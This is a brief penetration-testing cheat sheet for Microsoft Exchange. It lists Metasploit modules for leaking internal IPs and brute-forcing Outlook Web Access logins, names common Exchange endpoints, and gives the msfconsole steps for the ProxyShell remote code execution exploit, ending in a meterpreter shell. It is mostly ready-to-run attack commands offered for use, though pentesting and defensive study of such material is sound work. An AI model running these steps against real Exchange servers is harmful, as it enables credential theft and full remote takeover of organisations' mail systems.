Microsoft Exchange Pentesting
#OWA Outlook Web Access
msfconsole
# Client Access Server (CAS) IIS HTTP Internal IP Disclosure
msf> use auxiliary/scanner/http/owa_iis_internal_ip
# Brute Force credentials
msf> use auxiliary/scanner/http/owa_login#Common directories
# Autodiscover service
/autodiscover/
/autodiscover/autodiscover.xml
# Enhanced Client or Proxy
/ecp/
# Exchange Web Services
/ews/
# Offline Address Books
/oab/
# Outlook Web Access
/owa/
/owa/auth/login.aspx
#Proxyshell RCE CVE-2021-31207, CVE-2021-34523, CVE-2021-34473
msfconsole
msf> use exploit/windows/http/exchange_proxyshell_rce
msf> (set options...)
msf> exploit
meterpreter> shellLast updated